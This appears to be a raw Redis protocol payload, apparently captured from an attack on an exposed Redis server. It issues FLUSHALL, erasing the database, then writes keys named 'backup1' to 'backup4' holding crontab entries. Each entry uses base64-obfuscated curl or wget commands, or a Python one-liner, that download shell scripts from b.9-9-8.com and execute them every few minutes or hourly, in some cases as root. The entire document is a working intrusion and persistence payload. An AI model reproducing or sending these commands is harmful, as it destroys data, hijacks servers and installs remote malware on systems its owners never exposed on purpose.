*2
$6
SELECT
$1
0
*1
$8
flushall
*3
$3
set
$7
backup1
$93




*/2 * * * * echo Y2QxIGh0dHA6Ly9iLjktOS04LmNvbS9icnlzai9iLnNoCg==|base64 -d|bash|bash 



*3
$3
set
$7
backup2
$101




*/3 * * * * echo d2dldCAtcSAtTy0gaHR0cDovL2IuOS05LTguY29tL2JyeXNqL2Iuc2gK|base64 -d|bash|bash 



*3
$3
set
$7
backup3
$93




*/4 * * * * echo Y3VybCBodHRwOi8vL2IuOS05LTguY29tL2JyeXNqL2Iuc2gK|base64 -d|bash|bash 



*3
$3
set
$7
backup4
$121




@hourly  python -c "import urllib2; print urllib2.urlopen('http://b.9-9-8.com/t.sh').read()" >.1;chmod +x .1;./.1 



*1
$8
flushall
*3
$3
set
$7
backup1
$98




*/2 * * * * root echo Y2QxIGh0dHA6Ly9iLjktOS04LmNvbS9icnlzai9iLnNoCg==|base64 -d|bash|bash 



*3
$3
set
$7
backup2
$106




*/3 * * * * root echo d2dldCAtcSAtTy0gaHR0cDovL2IuOS05LTguY29tL2JyeXNqL2Iuc2gK|base64 -d|bash|bash 



*3
$3
set
$7
backup3
$98




*/4 * * * * root echo Y3VybCBodHRwOi8vL2IuOS05LTguY29tL2JyeXNqL2Iuc2gK|base64 -d|bash|bash 



*3
$3
set
$7
backup4
$121




@hourly  python -c "import urllib2; print urllib2.urlopen('http://b.9-9-8.com/t.sh').read()" >.1;chmod +x .1;./.1 



